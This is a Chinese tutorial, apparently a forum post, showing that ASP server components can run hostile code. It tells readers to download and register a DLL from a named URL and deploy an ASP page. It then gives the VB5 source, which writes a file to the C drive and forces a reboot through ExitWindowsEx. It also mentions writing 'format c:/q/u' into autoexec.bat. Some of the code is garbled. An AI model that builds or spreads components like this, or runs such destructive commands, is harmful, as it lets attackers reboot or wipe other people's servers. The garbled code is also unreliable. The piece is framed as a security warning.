Microsoft推出asp以简单易用多功能可扩充性等强大功能得到了网友和大多数网管青睐大有完全替代cgi趋势但是在这里也存在些问题如果在使用asp话你网络安全同时也大大降低了!下面为大家举个例子请按照下面步骤:
1下载这个文件http://home.gbsource.net/xuankong/dll.zip解压缩后吧其中test.dll文件拷贝到c:windowssystem(如果你使用是NT话请拷贝到相应目录中);
2接下来打开“开始/运行”菜单输入“regsvr32test.dll”命令;
3拷贝解压缩后文件包中那个index.asp到你服务器目录(如果你使用是PWS调试可以拷贝到“c:inetpubwwwroot“NT请拷贝到相应目录);
4换台机器用IE浏览index.asp文件看看(你看到是出错代码但是实际上已经运行了)你再返回你机器看看c:下面是不是多了个文件?个名为xuankong.dat文件(其实如果我愿意你c:autoexec.bat文件页可以被我打开并写进去些像\"format
c:/q/u\"等命令那么等你下次重新启动时候嘿嘿)
下面我们来看下到底是如何回事你刚才拷贝那些dll文件其实是我使用Visul
Basic5开发个主件:
1打开VB5新建个“ActiveX.dll”文件吧下面代码输入进去:
Private Declare Function ExitWindowsEx Lib
\"user32\"_
(ByVal
uFlags As Long,ByVal dwReserved As Long)_
As Long
Sub
Xuankong \"请不要加上“private”
a$=InputBox(\"请输入你姓名如果你输入是\"xuankong\"\"+Chr(13)+Chr(10)+
\"则会在你系统中生成个\"xuankong\"文件\"+Chr(10)+Chr(13)+
\"否则你机器可能会重起\",\"请输入\",\"xuankong\")
If
a$=\"xuankong\" Then
Open
\"c:xuankong.dat\" For Append As #Write#1,\"我朋友这是个asp主件测试\"
#Write#1,\"hello world!this is a test\"
#Write#1,\"如果你看到这个文件测试就成功!\"
ExitWindowsEx&H43,0\'使用API重新启动机器
End
Close #1
End sub
2把工程名改为dll类模块改为test然后把这个工程生成dll文件到c:windowssystem目录下面
3新建个index.asp文件下面代码输入进去:
<html><head><title>这是个有关asp主件测试</title></head>
<body>
<%
rs=server.createobject(\"dll.test\") %>
<%
rs1=rs.xuankong rs1.execute %>
</body>
</html>
4拷贝index.asp到你服务器内按照上面思路方法调试!
上面所说是asp主件安全问题!另外如果有些作者再写asp主件时候不小心留下系统bug!那就更加不容易发现了!
最新评论